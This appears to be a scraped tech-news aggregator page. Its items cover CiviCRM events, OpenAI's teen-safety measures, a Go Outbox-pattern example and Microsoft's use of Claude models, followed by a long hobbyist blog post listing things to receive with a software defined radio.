CiviCRM Scotland Meetup, Thursday 9th October 2025
CiviCRM
civicrm.org
2025-09-16 14:18:58
In this Meetup, Mads Mitchell of Pooka & Co and Humanist Society Scotland talks about how CiviCRM can be set up to support UK Gift Aid workflows for charities and nonprofits - including handling Gift Aid Declarations and reporting back to HMRC.
For existing CiviCRM users, there will be opportunities to meet and discuss CiviCRM with other organisations using the software in their day-to-day work, and to ask questions of experts.
You are invited to join us in person or online. The event is free, conveniently situated at The Melting Pot, next to Edinburgh Waverley train station - and there will be tea and biscuits!
CiviCamp Europe – Registration closes 5th of October
CiviCRM
civicrm.org
2025-09-16 12:39:36
Did you register for CiviCamp Europe? If not, you have until the 5th of October to register to join us at CiviCamp.
CiviCamp will be in Lunteren in the Netherlands. We have a one-day conference on Monday the 20th of October, a two-day Administrator training (Tuesday and Wednesday), a two-day Developer training (Tuesday and Wednesday), and a four-day sprint (Tuesday to Friday).
OpenAI has announced it is introducing new safety measures for ChatGPT after a wave of stories and lawsuits accusing ChatGPT and other chatbots of playing a role in a number of teen suicides. ChatGPT will now attempt to guess a user’s age, and in some cases might require users to share an ID in order to verify that they are at least 18 years old.
“We know this is a privacy compromise for adults but believe it is a worthy tradeoff,” the company said in its announcement.
“I don't expect that everyone will agree with these tradeoffs, but given the conflict it is important to explain our decisionmaking,” OpenAI CEO Sam Altman said on X.
In August, OpenAI was sued by the parents of Adam Raine, who died by suicide in April. The lawsuit alleges that ChatGPT helped him write the first draft of his suicide note, suggested improvements on his methods, ignored early attempts at self-harm, and urged him not to talk to adults about what he was going through.
“Where a trusted human may have responded with concern and encouraged him to get professional help, ChatGPT pulled Adam deeper into a dark and hopeless place by assuring him that ‘many people who struggle with anxiety or intrusive thoughts find solace in imagining an ‘escape hatch’ because it can feel like a way to regain control.’”
In August the Wall Street Journal also reported a story about a 56-year-old man who committed a murder-suicide after ChatGPT indulged his paranoia. Today, the Washington Post reported on another lawsuit alleging that a Character AI chatbot contributed to a 13-year-old girl’s death by suicide.
OpenAI introduced parental controls to ChatGPT earlier in September, but has now introduced new, stricter and more invasive security measures.
In addition to attempting to guess or verify a user’s age, ChatGPT will now also apply different rules to teens who are using the chatbot.
“For example, ChatGPT will be trained not to do the above-mentioned flirtatious talk if asked, or engage in discussions about suicide or self-harm even in a creative writing setting,” the announcement said. “And, if an under-18 user is having suicidal ideation, we will attempt to contact the users’ parents and if unable, will contact the authorities in case of imminent harm.”
OpenAI’s post explains that it is struggling to manage an inherent problem with large language models that 404 Media has tracked for several years. ChatGPT used to be a far more restricted chatbot that would refuse to engage users on a wide variety of issues the company deemed dangerous or inappropriate. Competition from other models, especially locally hosted and so-called “uncensored” models, and a political shift to the right that sees many forms of content moderation as censorship, have caused OpenAI to loosen those restrictions.
“We want users to be able to use our tools in the way that they want, within very broad bounds of safety,” OpenAI said in its announcement. The position it seems to have landed on, given these recent stories about teen suicide: “‘Treat our adult users like adults’ is how we talk about this internally, extending freedom as far as possible without causing harm or undermining anyone else’s freedom.”
OpenAI is not the first company that’s attempting to use machine learning to predict the age of its users. In July, YouTube announced it will use a similar method to “protect” teens from certain types of content on its platform.
About the author
Emanuel Maiberg is interested in little known communities and processes that shape technology, troublemakers, and petty beefs. Email him at emanuel@404media.co
How to implement the Outbox pattern in Go and Postgres
Lobsters
medium.com
2025-09-16 15:56:04
How and why to use the Outbox pattern to build a robust event-driven system.
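The linked article has its own implementation, but the core idea fits in a few lines. Below is a minimal Go sketch of the pattern, added here for illustration (the orders and outbox tables, their columns, and the function name are assumptions, not the article's code): the business row and its outgoing event are written in one Postgres transaction, and a separate relay process publishes rows from the outbox table to the broker.

```go
package outbox

import (
	"context"
	"database/sql"
	"encoding/json"
)

// SaveOrderWithEvent writes an order row and its "order_created" event in a
// single transaction, so the event is recorded if and only if the business
// write commits. Schema and names here are illustrative assumptions.
func SaveOrderWithEvent(ctx context.Context, db *sql.DB, orderID string, order any) error {
	payload, err := json.Marshal(order)
	if err != nil {
		return err
	}

	tx, err := db.BeginTx(ctx, nil)
	if err != nil {
		return err
	}
	defer tx.Rollback() // no-op after a successful Commit

	if _, err := tx.ExecContext(ctx,
		`INSERT INTO orders (id, body) VALUES ($1, $2)`, orderID, payload); err != nil {
		return err
	}

	// Same transaction: a relay process later polls this table (or tails the
	// WAL) and publishes unsent rows to the message broker, marking them sent.
	if _, err := tx.ExecContext(ctx,
		`INSERT INTO outbox (event_type, payload) VALUES ($1, $2)`,
		"order_created", payload); err != nil {
		return err
	}
	return tx.Commit()
}
```

The point of the pattern is atomicity: publishing to a broker directly from application code can succeed while the database write fails (or the other way around), and routing events through a table in the same transaction closes that window.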
Tom Warren is a senior editor and author of Notepad, who has been covering all things Microsoft, PC, and tech for over 20 years.
Microsoft is adding automatic AI model selection to its Visual Studio Code editor, which will pick the best model for “optimal performance.” This new auto model feature will select between Claude Sonnet 4, GPT-5, GPT-5 mini and other models for GitHub Copilot free users, but paid users will “primarily rely on Claude Sonnet 4.”
It’s a tacit admission from Microsoft that the software maker is favoring Anthropic’s AI models over OpenAI’s latest GPT-5 models for coding and development. Sources familiar with Microsoft’s developer plans tell me that the company has been instructing its own developers to use Claude Sonnet 4 in recent months.
“Based on internal benchmarks, Claude Sonnet 4 is our recommended model for GitHub Copilot,” said Julia Liuson, head of Microsoft’s developer division, in an internal email in June. While that guidance was issued ahead of the GPT-5 release, I understand Microsoft’s model guidance hasn’t changed.
Microsoft is also making “significant investments” in training its own AI models. “We’re also going to be making significant investments in our own cluster. So today, MAI-1-preview was only trained on 15,000 H100s, a tiny cluster in the grand scheme of things,” said Microsoft AI chief Mustafa Suleyman in an employee-only town hall last week.
Microsoft is also reportedly planning to use Anthropic’s AI models for some features in its Microsoft 365 apps soon. The Information reports that Microsoft 365 Copilot will be “partly powered by Anthropic models,” after Microsoft found that some of these models outperformed OpenAI in Excel and PowerPoint.
OpenAI and Microsoft announced a new deal last week that could clear the way for the AI startup’s initial public offering. Microsoft has invested more than $13 billion in OpenAI since 2019, and has a complex revenue sharing agreement in place. Microsoft now allows OpenAI to lean on rival cloud providers, and is expected to reveal further details about the “next phase” of its OpenAI relationship soon.
Last week, I went on an adventure through the electromagnetic spectrum!
It’s like an invisible world that always surrounds us, and allows us to do many amazing things: It’s how radio and TV are transmitted, it’s how we communicate using Wi-Fi or our phones. And there are many more things to discover there, from all over the world.
In this post, I’ll show you fifty things you can find there – all you need is this simple USB dongle and an antenna kit!
I found that to be a very exciting experience – trying to make so many new things really pushed me to leave my comfort zone, to be creative, and not to get sucked too deep into rabbit holes.
I knew I definitely wanted to try the technique again. So, when I took a week of vacation, I decided to try to find 50 things to do with a Software Defined Radio!
What is an SDR?
A Software Defined Radio is essentially a radio that relies on a computer to do most of its data processing. It doesn’t rely on analog hardware too much – instead, most of what it does is “defined in software”, hence the name.
Usually, SDRs can detect electromagnetic waves in a much wider range than a common FM radio, which makes it especially exciting! I got interested in SDRs after reading about Albert’s project to build one as a module for the Framework laptop!
What you’ll need
I went into this week without much knowledge of the things I’d find. I’d read through an introductory course for aspiring amateur radio operators (more on that later), but I barely knew which way to point my antenna.
If you want to follow along, this section is intended to help you get started!
Most of the 50 things also have a little infobox at the beginning, explaining the frequencies, and some special knowledge needed to receive them.
Hardware
I looked into the topic a bit, and a popular, cheap SDR right now is the RTL-SDR Blog V4, which has the form factor of a simple USB dongle. You can get it for around $30, or as a kit with telescopic antennas for $50.
Everything I tried during this week was done using this USB dongle, the antenna kit, and a long piece of wire!
(By the way, there’s another great option if you don’t want to buy anything – lots of people make their SDR accessible through the Internet! You can find a map here.)
Using the antennas
I tried to adjust my antenna to the desired frequencies as best as I could. I think for receiving, it’s not super important that your antenna is perfectly configured, though.
For most applications, I used the dipole antennas that came with the kit I purchased. Dipole antennas have two sides that stick out the same length. You generally wanna make the whole antenna half as long as the wavelength you want to receive, and orient it vertically.
My rule of thumb was to divide 72 by the frequency in MHz, and take that as the length of each side of the dipole in meters. That’d make the whole antenna a bit shorter than half of the wavelength.
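To make the rule concrete (my own arithmetic, added for illustration, not from the kit's instructions): at 100 MHz, each dipole leg comes out at 0.72 m, so the whole antenna is 1.44 m – a bit under the 1.5 m half wavelength:

```latex
\ell_{\text{leg}} = \frac{72}{f/\text{MHz}}\,\text{m} = \frac{72}{100}\,\text{m} = 0.72\,\text{m},
\qquad
\ell_{\text{total}} = 2\,\ell_{\text{leg}} = 1.44\,\text{m}
\;<\; \frac{\lambda}{2} = \frac{300/100}{2}\,\text{m} = 1.5\,\text{m}
```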
For example, this is what the configuration looked like for frequencies around 100 MHz:
And for higher frequencies, I used the tiny screw-on antennas from the kit:
For specific applications like receiving satellites, or receiving locators for airplanes, I used special configurations, but I’ll discuss these as we go!
Software
The software I liked best, and which I used for many things, was SDR++. It allows you to explore the frequency spectrum very smoothly, and has a modern user interface!
But I also used plenty of other software, on Linux in my case. I’ll link to the software as needed below.
Monday
On Monday morning, I was excited to start this project! I sat down at my desk, and got to work!
1: Listen to FM radio
Frequency: 87.5-108 MHz
Modulation: FM (“frequency modulation”)
This was an obvious first thing to do, as the signals are very strong! I was using the SDR++ software, and it felt very nice browsing around and discovering the stations around me! It reminded me of exploring the radio as a child.
I found a local station that gives 1-hour slots to civic groups, for example!
2: Listen to Freenet
Frequency: 149.01-149.11 MHz
Modulation: FM
This is a special frequency range in Germany: Anyone is allowed to send there, using licensed devices. There are 6 channels.
I think someone was testing their device there when I listened in. :D I heard a “Hellooo?”, then a “Test, test”, and then a “General call to all stations”. Oh, and shortly after a short transmission on channel 3 in a Slavic-sounding language!
Freenet devices have a range of only a couple of kilometers, so these people must have been pretty close! :O
3: Receive weather conditions from airports
Frequency: Differs by airport, search term is “ATIS”
Modulation: AM
While browsing the aviation frequencies, I found this station that reports weather conditions in an endless loop. It seems to be the “Automatic Terminal Information Service” of Hamburg airport!
Thanks to that, I found out that the current air pressure was 1011 hPa! :D
4: Listen to airplane communication
Listening to “messages not meant for the general public” is not allowed in Germany, so of course I didn’t do that. And if I had accidentally done that, I wouldn’t be allowed to tell you about it. 🙅
5: Track aircraft via ADS-B
Frequency: 1090 MHz
Protocol: ADS-B
That’s short for “Automatic Dependent Surveillance – Broadcast”. Aircraft send it automatically to be tracked.
For this, I built my first antenna! From wire and an antenna connector called “SMA”.
And it worked! \o/ I decoded the signal using the software SDRangel. Fascinating! I saw some big & small airplanes, and even a helicopter!
6: Listen to stereo FM radio
Frequency: 87.5-108 MHz
Modulation: FM
How stereo audio is transmitted is really interesting, because it’s backwards-compatible to receivers that don’t support it:
Here, you see the demodulated audio frequency spectrum, as shown in SDRangel. Below 19 kHz, it’s just mono audio. Then, to mark a stereo station, there’s a constant “pilot tone” at 19 kHz! (Outside of what most humans can hear.)
Then, if you double the frequency of the pilot tone, you can derive the sections where the difference of the left & right channel to the mono channel is transmitted!
Correction: I’ve been told that instead of what I call “left” and “right” in this diagram, the upper frequencies transmit the difference of the left and right channels! That way, the receiver can calculate the left and right channels from the mono signal (which is, essentially, the sum of left and right).
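As formulas (a summary of the standard FM stereo multiplex; the notation is added here for illustration, it's not from the original diagram): the baseband carries the sum of the channels, the region around 38 kHz carries the difference, and the receiver solves for both:

```latex
M = L + R \;(\text{below }19\,\text{kHz}), \qquad
S = L - R \;(\text{around }38\,\text{kHz})
\quad\Longrightarrow\quad
L = \tfrac{1}{2}(M+S), \qquad R = \tfrac{1}{2}(M-S)
```

A mono receiver just plays M and never notices the rest.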
7: Receive road traffic information
Frequency: 87.5-108 MHz
If you triple the frequency of the pilot tone, you get to a range where FM stations transmit small amounts of digital metadata, like the name and genre of the station, and the current song! That’s a protocol called Radio Data System.
This system can also transmit road traffic information! There seemed to be a road closure at “0x64BE”, as decoded by SDRangel.
The Federal Highway Research Institute publishes an Excel table, where I could look up that this is a town in Lower Saxony!
8: Listen to conversations on the 2-meter amateur radio band
Frequency: 144-146 MHz
Modulation: FM
This is a frequency range reserved for amateur radio operators – for non-commercial use only. You may send on this band after getting a license.
What I found here is seemingly a conversation circle facilitated by a relay around 15 km away from here – it takes input on a certain frequency, and outputs an amplified copy of it on another frequency! Klaus, Bernd, Jürgen and Horst were talking about antennas, relays, and Windows XP! 😁
9: Listen to digital radio
Frequency: 174-240 MHz
The SDRangel software also has a demodulator for Digital Audio Broadcast! :O I continue to be amazed by it!
I think this was the first time I’ve received digital radio via air! I saw so many stations, and I’ve only checked a couple of channels.
The advantage of this digital channel is that there’s no noise. And I even saw a “cover image” in one of the programs!
10: Listen to PMR446
Frequency: 446.0-446.2 MHz
Modulation: FM
This is a frequency range for “Private Mobile Radio”. It’s another of these bands where anyone can transmit using a licensed device!
Not a lot of activity here. I heard “Hello, hellooo!”, “Can you hear me?” and some short transmissions that sounded like a child! :D
There also seemed to be digital transmissions, but I didn’t know how to decode them yet.
The range of PMR446 devices is pretty low (a couple of hundred metres in cities), so again, the people must’ve been close!
Tuesday
After the first day of SDR experiments, I was amazed how much invisible communication is going on around us in the electromagnetic spectrum at the same time!
I posted each of these things on Mastodon as I went, and asked people for suggestions for more things I could receive.
11: Read your neighbors’ sensors
Frequency: 433.05-434.79 MHz
At 433 MHz, there’s a frequency band for “industrial, scientific and medical” applications. And wow, there was quite a lot of activity nearby!
Using the decoder rtl_433, I saw two sensors that output the current temperature, humidity, and air pressure!
There were also some “IBIS beacons” flying by, which are used in public transportation, so maybe it’s buses driving by?
Later, an “Interlogix Security” device also appeared, reporting “closed switch states” :O
12: Track ships!
Frequency: 162.025 MHz
Ships send out their status using AIS (Automatic Identification System). And again, I received a lot of them here in Hamburg! :O
I was especially excited to receive data from the MS Stubnitz (a fishing boat that was turned into a culture center/techno club)! It reports its status as “moored”, and its speed as 0.1 knots! :D
Again, I used the software SDRangel. Apparently, it can also display a 3D map, but I haven’t figured out how to add 3D models…
13: Detect GSM activity
Frequency: 876-959 MHz, I looked up the specific ranges for Germany on Wikipedia
I was curious whether you could tell if someone used their phone! So I borrowed a GSM phone, tuned to the correct frequencies, and made some test calls.
What surprised me most: You can kind of “see” the volume at which I was talking!?
In the recording, the three dense bands at the end were when I was humming into the phone at the other end. This only worked in the “receiving” direction.
Wednesday
14: Receive signals from a satellite!
Frequency: 136-138 MHz
I spent all Tuesday afternoon and evening learning about satellites. The program gpredict is really nice to find out when satellites will pass overhead! I learned a lot, including that one satellite I was trying to receive burned up last week! :D
I was super excited when I first received a signal from a NOAA satellite! 🛰️
But I didn’t manage to decode it properly yet. Maybe my reception was too noisy? I wanted to keep trying, but I had to move on.
15: Admire TETRA signals
In Germany, the police have switched to an encrypted digital protocol called TETRA.
Even though I’ve seen some interesting talks at CCC events about weaknesses in the encryption, all I wanted to do for now was look at the pretty signals in SDR++. :3
16: Listen to taxi dispatchers
Again, this is communication not meant for the general public.
I didn’t listen to someone dispatching taxis to specific addresses, and you shouldn’t do that either. 🚕
Stay away from a site called “frequenzdatenbank”!
17: Ponder mysterious signals
Some of the most fun I had was just browsing frequencies and seeing what I could find! Sometimes, I encountered signals I couldn’t identify.
For example, at 865-868 MHz, there was a family of slow, continuous, digital signals that made a nice melody when listened to in single-sideband demodulation!
And at 177-180 MHz, there were two very broadband transmissions. Might be TV? But I couldn’t find out what type. (It later turned out that I’d already listened to these signals – it was digital radio, DAB+.)
18: Track weather balloons
Frequency: 400-405.9 MHz
As I was browsing around for things to receive, I saw on this tracking website that a radiosonde had just been launched in Hamburg! SDRangel could decode its transmission! It had climbed to a height of 7 km, and it was -17 °C up there!
I knew that it would eventually burst and fall back to Earth, and that I could try to get to it and find it!
19: Hunt weather balloons!
I decided to go on a field trip, using trains and my bike.
I was following the tracker. The balloon popped earlier than predicted, and I frantically changed travel plans!
Eventually, it landed in a forest. I hoped I could get to it! What made this adventure more tricky was that my mobile Internet contract ran out while I was on the go, and my battery was also almost empty.
But I made it to the forest, and entered it.
As I circled the site, I encountered a person in their 60s, with a stubbly beard and a blue wool hat. He was looking in the direction of the crash site, and was holding a smartphone, so I asked him whether he also was looking for the radiosonde.
He was! We looked for it together for half an hour, jumping over small rivers and crawling through the woods, while he gave me a lot of tips related to hunting sondes.
He told me that he had found around 40 of them so far!
Usually, the sondes keep broadcasting after landing, but this one wasn’t. So he quickly guessed that someone else could’ve taken it. Or maybe it landed in the water and died?
Some pictures of the area we searched:
Eventually, we gave up, and walked back to our vehicles. He also is an amateur radio operator, and could answer a couple of questions related to building antennas!
And he was right: Someone had been faster than us! The status was changed. So in the end, I didn’t find the sonde. But I found something that might be even better – a friend!
20: Receive amateur packet radio
Frequency: 144.8 MHz
In the 2-meter amateur band, there are certain frequencies for the “Automatic Packet Reporting System”. It’s a bit like IP – packets have a “from” and a “to”. They can also broadcast their position, or weather data.
Some stations seem to announce themselves as repeaters, which probably help forward the packets to increase the range.
And two people seemed to be on a “field day”, and broadcast their location. :D
SDRangel can create a map automatically:
Thursday
I started the day by building an antenna!
This was going to be a simple “random wire” antenna, to allow me to get better reception in the lower frequencies, which I’ve omitted so far (because I knew it would be much more fun with a better antenna)!
I measured out 21.6 m of wire (which for ✨magic✨ reasons seems to be a good universal antenna length)…
…directly attached it to the center of another SMA connector…
…and draped it all around my room!
People on the Internet say that there are many problems with this – that it would be better to have it outside, and that there’s an impedance mismatch between the receiver and the wire.
I could address those problems, but I wanna try how well this works first :)
21: Receive Morse code from other countries
Frequency: 10.10-10.13 MHz
Modulation: CW (“continuous wave”)
On the 30-meter amateur band, I found people sending Morse code! :O
I’d been learning it a little bit, so if I recorded it and slowed it down, I could understand it: They’re sending their callsigns. These are from Belgium, France, and Italy! \o/
Compared to my 2-meter dipole antenna, the reception was definitely better – I could pick up more transmissions, and with much less noise!
22: Receive maritime weather reports
Frequency: 11.039 MHz
The German Weather Service broadcasts maritime information throughout the day on various shortwave frequencies.
They use a protocol called RTTY (radioteletype), and it took me a while to decode it. But I found a neat little program called “fldigi”: You can pipe audio to it (single side band modulation), and then if you pick the correct settings (see screenshot), it happily transcribes the messages!
Here are the station weather reports for the Baltic Sea and the North Sea!
23: Receive digimodes from other countries
Frequency: 10.130-10.15 MHz
I found some other strange signals on the 30-meter band. The Signal Identification Wiki was really helpful for figuring out what they were:
FT8!
FT8 is quite a new protocol, invented in 2017, and it seems to be super popular right now! It allows you to transmit short messages, and again, people are looking for people to talk to (CQ), saying how well they receive each other, or saying goodbye (73).
24: Track down interference
As I was browsing the very low-frequency bands, I had a strange problem: Sometimes, it would work okayish, and sometimes I could even make out voices!
But other times, it wouldn’t work at all, and everything would be loud, angry noise. Even in regions where I had better reception before!
Eventually, I found out how to solve that issue – by unplugging my notebook charger. D’oh! :D
25 & 26: See ionosondes and radar signals
Frequency: 6-30 MHz
In the low frequencies, occasionally, you can hear a short chirp! :D These are caused by ionosondes, scientific instruments which measure the properties of the ionosphere by sweeping a wide frequency spectrum.
Another signal (which I accidentally got in the same screenshot) is a radar system – in this case, according to the Signal Identification Wiki, it’s a “CODAR” system, used to measure the motion of water waves and currents along coasts! :O
27: Listen to “single side band” conversations
Frequency: In all amateur bands, especially the ones below 30 MHz
Modulation: SSB (“single side band”)
How do you transmit speech over long distances? You can use “amplitude modulation”, where you change the volume of the carrier frequency to model your audio.
As a side effect, the bands to the sides of the carrier will contain a signal, as well.
One trick is to transmit just those sidebands, which saves power! But you have to “guess” the base frequency when listening. Depending on which part you transmit, this is called “lower side band” or “upper side band”.
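Why the sidebands carry everything (an aside added for illustration, using a single audio tone f_m for simplicity): amplitude modulation is a product of cosines, which expands into the carrier plus two mirror-image sidebands:

```latex
\bigl(1+\cos 2\pi f_m t\bigr)\cos 2\pi f_c t
= \cos 2\pi f_c t
+ \tfrac{1}{2}\cos 2\pi (f_c - f_m)t
+ \tfrac{1}{2}\cos 2\pi (f_c + f_m)t
```

Each sideband alone contains the full audio, so dropping the carrier and one sideband saves power at the cost of the receiver having to re-guess the base frequency.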
SDR++ makes it very easy to play with this! :) Here’s someone from Serbia!
28: Listen to AM radio from the other side of the world
At night, low-frequency radio waves can travel further around the world, because they’re reflected by the layers of the ionosphere! There’s something magical about this.
I put my antenna outside, and I could hear a lot of broadcasting stations! On short-wave.info, you can look up where they are located. Some stations in China are broadcasting with very high power! Some I could hear were over 7500 km away.
Wow. It’s full of stars! 🌌
Friday
Originally, I had planned the project to run from Monday to Friday. When I still had 22 things to do on Friday morning, I knew I’d need to extend it. But I hadn’t run out of ideas yet:
29: Listen to CB radio
Frequency: 26.965-27.405 MHz
Modulation: FM or AM
After I’d looked into the low frequencies on Thursday, I went to a higher band again: The Citizens Band!
This is the third frequency band I’m aware of where anyone is allowed to transmit – provided that you use a licensed device!
This is a band where my random wire antenna really came in handy. Without it, I would have had a hard time understanding anything. And even with it, transmissions are extremely noisy.
CB radio is used internationally, especially by truck drivers, it seems.
30: Assess the propagation of radio waves using beacons
Frequency: 14.100, 18.110, 21.150, 24.930, and 28.200 MHz
Modulation: CW
The International Beacon Project runs a network of 18 stations, which take turns transmitting their callsigns at certain frequencies.
Using this system, you can quickly get a sense of how well radio waves are currently propagating to your location. Clever!
I picked up the beacon from southern Finland! You can see its callsign scrolling away in the video. It’s followed by four dashes sent with decreasing power. I only heard the first one…
31: Receive a time signal
Frequency: 9996 kHz
Modulation: CW
I would’ve loved to receive DCF77, which powers the radio clocks in Germany! But no matter how hard I listened to 77.5 kHz, there was nothing there. I don’t think my dongle can do that.
So I used higher frequencies! Russia transmits its “RWM” time signal at 9996 kHz, which beeps every second, with a long beep for the full minute.
Not enough to tell the time, but enough to adjust your wrist watch, I guess!
32: Receive a weather fax
Frequency: 3855, 7880, and 13882.5 kHz (see weatherfax.com for more)
The German Weather Service broadcasts weather maps throughout the day! You can decode them using fldigi’s “WEFAX-576” setting.
I caught this one only halfway through. According to the schedule, it’s the “Surface weather chart North Atlantic, Europe”!
If you squint really hard, you can make out the coast of Spain and the Mediterranean Sea on the right side!
33: Decode images from a weather satellite!
Frequency: 137.62, 137.9125, and 137.1 MHz
I couldn’t stop trying to capture a weather satellite, it’s just too cool to receive an image from space!
That evening, an American satellite called NOAA-15 passed right over us, so I thought I’d try again. And this time, I got parts of an image! \o/
This is real-time data! At night, both transmitted images are infrared recordings.
I recorded the FM signal using SDR++, and then decoded the image using noaa-apt, which also added country outlines.
34: Estimate the speed of satellites
Frequency: 136-138 MHz
Here’s what the NOAA-15 weather satellite sounds like, by the way!
tick-tock
While recording, I noticed something strange: The transmission didn’t happen at the frequency I had expected it to! And also, the frequency changed.
Then it hit me: Doppler effect! At the time of the recording, the frequency was around 4250 Hz higher than expected.
After looking up the formula, I calculated a relative speed of 9 km/s! (Which is close to its real speed, 7.5 km/s.)
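Spelled out (my own arithmetic, added for illustration, plugging in the numbers from above):

```latex
v \;\approx\; c\,\frac{\Delta f}{f}
\;=\; 3\times 10^{8}\,\tfrac{\text{m}}{\text{s}} \cdot \frac{4250\,\text{Hz}}{137.62\times 10^{6}\,\text{Hz}}
\;\approx\; 9.3\,\tfrac{\text{km}}{\text{s}}
```

Strictly, this estimates the line-of-sight component of the velocity, and any tuning offset in the receiver leaks into Δf, so only a rough match with the orbital speed can be expected.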
35: Listen to number stations
Frequency: 5-30 MHz?
Modulation: Differs by station
These stations send encrypted messages using number sequences, possibly for espionage purposes!
So why not listen to one? There’s a surprisingly well-maintained database of them on a site called Priyom.
So I tuned into the next frequency that was listed, and: Bingo!
Allegedly, this was a station in Moscow. That day, it sent “218, 218, 218” in a loop, followed by three long beeps, which is the format of a “null message”.
So no news for the Russian spies.
Saturday
The week was really intense for me. Initially, I thought I’d do 10 things per day, but it turned out that that was too much. I had to learn so many new things.
Many things I tried didn’t work on the first attempt. Finding LoRaWAN signals, decoding packet radio, finding something on PMR446, decoding the satellite – those were all things that required a second (or third) attempt.
This project was exhausting, but also joyful – having committed to it, I got in a nice flow state, where I could focus on it for hours.
Often, I thought: “Okay, this is it. I can’t possibly find more things.” But this is the power of the 50 Things technique: I have to keep looking, leave my comfort zone, be creative, try things I otherwise wouldn’t have tried!
So, 15 more things, huh?
36: Receive images from amateur radio operators
Frequency: 14.230, 14.233, 21.340, 28.680, 145.625 MHz seem to be popular
Using a protocol called “SSTV” (slow-scan television), amateur radio operators send each other postcards! :D
I’ve been browsing the usual frequencies, and tried to decode images using the software QSSTV on Linux. And I accidentally caught a piece of what seems to be a test image!
SSTV has the prettiest noise! :3
37: Listen to The Buzzer
Frequency: 4625 kHz
Modulation: Upper side band
There’s a mysterious Russian station broadcasting at 4625 kHz. Sometimes, it sends encrypted voice messages.
But usually, all it does is send a honking sound every two seconds, to deter other stations from using the same frequency.
The purpose of the station is unclear, but most theories assume it’s for military communication.
38: Catch a LoRaWAN chirp
Frequency: 868.1-868.5 MHz
This was a bit like trying to catch a rare insect! 🐛
LoRaWAN is a low-power, wide-area networking protocol, intended for “Internet of Things” applications.
You can see a transmission in the lower half of the screenshot! It has a very cute structure: You can see eight “down-chirps”, followed by two “up-chirps”. That’s the header, followed by the payload.
To look for the signal, I made a “baseband capture” in SDR++, and opened the recording in Sonic Visualizer.
39: Read data from utility meters
Frequency: 868.95 MHz
Devices like smoke detectors or meters for water or heat send their readings via a protocol called Wireless M-Bus.
Again, I was surprised by how many devices seem to be around! Thanks for the tip, @envy :)
wmbusmeters is a really nice tool for decoding the messages.
40: “Watch” TV
Frequency: 174-786 MHz
The chips in my SDR stick are also used in DVB-T dongles! So, can we watch TV? Unfortunately, no.
From what I pieced together, there’s a difference between using the stick in SDR mode (where it sends the full spectrum), and in TV mode (where it sends the decoded video).
In Germany, there’s now DVB-T2, which my hardware doesn’t support in TV mode. And in SDR mode, the bandwidth is too narrow for DVB-T2. But we can scroll over a channel and look at it! :3
41: Track cars and buses
Frequency: 433.05-434.79 MHz
I took a little walk to a big intersection, to see what “device signals” I’d find there at 433 MHz.
I could confirm that the IBIS beacons are in fact being sent by buses! The included “vehicle ID” even matches the white number that’s printed on it.
I also saw some messages from tire pressure monitoring systems in cars! They also include an ID, and usually, the brand of the car! The owners probably aren’t aware how easy it would be to track them… (Thanks, @scy!)
Side note: I wonder why some signals in that band are warped like the one at 433.96 MHz here!
At first, I thought “Ah, Doppler effect again, it’s coming from a moving car!” But if that were the case, that car would be moving at over 700 m/s…
Friends later suspected that this effect is due to weak batteries affecting the crystal in the sending devices, or temperature changes.
42: Receive Morse code from a satellite!
Frequency: 145.860 MHz (status information) and 145.960 MHz (beacon)
Modulation: CW
So I caught a satellite again! :D This time, it was a school project, the Italian satellite “Max Valier”. It continuously sends Morse code on a beacon frequency.
Pretty weak signal, but here’s what I could hear:
3MV MAX VALIER SAT ... MANFRED ES CHRISTA FUKSE 73 ... II3MV ...
Super happy about this! I got both the name of the satellite, as well as its callsign at the end, and what seems to be some kind of greeting? I later learned that ES is Morse code shorthand for “and”, and that Manfred and Christa Fuchs were the founders of a company that helped launch the satellite!
(Thanks for the tip, @manawyrm!)
43: Don’t decode pager messages
This is another thing that’s not allowed in Germany, so you shouldn’t do it.
Pagers use a format called “POCSAG” (Post Office Code Standardisation Advisory Group…), which you should not decode using multimon-ng.
Because you would find that the content is short and cryptic anyway. It would probably be repeated by several stations all around you, to make sure the whole region is covered.
Do not read the English Wikipedia page! It contains frequencies!
Sunday
At this point, I was pretty tired. Focusing on this project for 6 days straight took a lot of energy, and I was always uncertain if I could actually complete all 50 things in that week! But I woke up with a fun idea:
44: Detect when a smartphone is turned on
Frequency: 13.56 MHz
I was curious whether I could see the NFC transceiver in my smartphone! And yeah, especially using my random wire antenna, this works really well!
My smartphone seems to emit at the NFC frequency a couple of times per second. And when unlocking the screen, it emits five very strong beeps on that frequency! I can see those from the other side of our apartment.
Surely, these signals are the same for every device, right? 😶
Observe the five beeps here:
45: Communicate wirelessly using… a book
Frequency: 13.56 MHz
Piko and I played around with NFC a bit more, and we found out that when getting close to an NFC tag, a smartphone emits at 13.56 MHz continuously!
So, we started sending Morse code to each other between rooms, using a smartphone and a library book! :’D
Take that, Bundesnetzagentur!
Seems that the shortest signal you can create is 0.7 s long, resulting in a meager communication speed of 3-4 words per minute…
46: Receive navigational aids for airplanes
Frequency: 108.00-117.95 MHz
There are ground stations that emit a signal that allows you to calculate your angle relative to them! If you receive two, you can determine your position. (Thanks, @fly_it!)
I heard the one close to Hamburg! And SDRangel has a decoder, of course! It calculated angles between 210° and 230°, which is pretty close to the actual value of 224°! I don’t think they are meant to be used from the ground.
I spent ages trying to build my own decoder in GNU Radio. But I wasn’t familiar with it at all, and I eventually gave up. Still, that seems to be the software you wanna learn for tasks like these!
By the way, how the ground stations work is fascinating: In my case, it’s a “Doppler VOR”: It transmits a static frequency via amplitude modulation, and adds another signal that moves around in circles, so you get a Doppler frequency shift.
If you compare the two, you can calculate the angle!
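In formula form (a summary of the textbook Doppler-VOR scheme, added for illustration, not from the original post): both signals carry a 30 Hz component, one with a fixed phase and one whose phase depends on your direction from the station, so the bearing θ is just their phase difference:

```latex
% reference (AM) and variable (Doppler) 30 Hz components:
r(t) = \cos(2\pi\cdot 30\,t), \qquad
v(t) = \cos(2\pi\cdot 30\,t - \theta)
```

Measure the phase offset between the two demodulated 30 Hz tones and you have read off your radial from the station.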
47: See how low you can go in the frequency spectrum
Modulation: mostly AM
This was a fun exploration: What’s the lowest-frequency broadcast I can receive?
The RTL-SDR Blog V4 stick I’m using has a neat feature – a built-in “upconverter”, which is enabled automatically when you try to listen to frequencies below what the chipset supports. This allows it to receive down to ~500 kHz!
For me, the first comprehensible stations started at around 1 MHz.
48: See how high you can go in the frequency spectrum
The chipset in my SDR stick goes up to a maximum frequency of 1766 MHz. It seems pretty quiet up there, probably because I lack proper antennas. I found these three lines in an amateur band, but they probably originate from the stick itself, or another device.
So the highest-frequency thing I’ve received is ADS-B at 1090 MHz (see entry #5)! 🎉
49: Listen to marine radio
